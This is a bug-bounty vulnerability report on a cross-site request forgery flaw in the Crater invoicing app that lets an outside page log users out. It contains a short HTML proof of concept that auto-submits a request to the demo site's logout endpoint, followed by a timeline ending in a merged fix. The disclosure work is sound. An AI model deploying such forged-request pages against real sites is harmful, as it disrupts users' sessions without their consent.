Cross-Site Request Forgery (CSRF) in crater-invoice/crater

Valid

Reported on

Jan 27th 2022


Description

An attacker is able to log out a user if a logged-in user visits the attacker's website.

Proof of Concept

<html>
    <body>
    <script>history.pushState('', '', '/')</script>
        <form action="https://demo.craterapp.com/auth/logout">
            <input type="submit" value="Submit request" />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>

Impact

This vulnerability is capable of forging users to unintentional logout.

More details

One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out. This is why it should be a POST with a CSRF token.

Note

While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.

We are processing your report and will contact the crater-invoice/crater team within 24 hours. 4 months ago
We have contacted a member of the crater-invoice/crater team and are waiting to hear back 4 months ago
We have sent a follow up to the crater-invoice/crater team. We will try again in 7 days. 4 months ago
We have sent a second follow up to the crater-invoice/crater team. We will try again in 10 days. 4 months ago
Mohit Panjwani validated this vulnerability 3 months ago
KhanhCM has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the crater-invoice/crater team. We will try again in 7 days. 3 months ago
We have sent a second fix follow up to the crater-invoice/crater team. We will try again in 10 days. 3 months ago
We have sent a third and final fix follow up to the crater-invoice/crater team. This report is now considered stale. 3 months ago
Mohit Panjwani confirmed that a fix has been merged on 2b7028 2 months ago
Mohit Panjwani has been awarded the fix bounty
auth.js#L46-L69 has been validated
web.php#L40-L48 has been validated
to join this conversation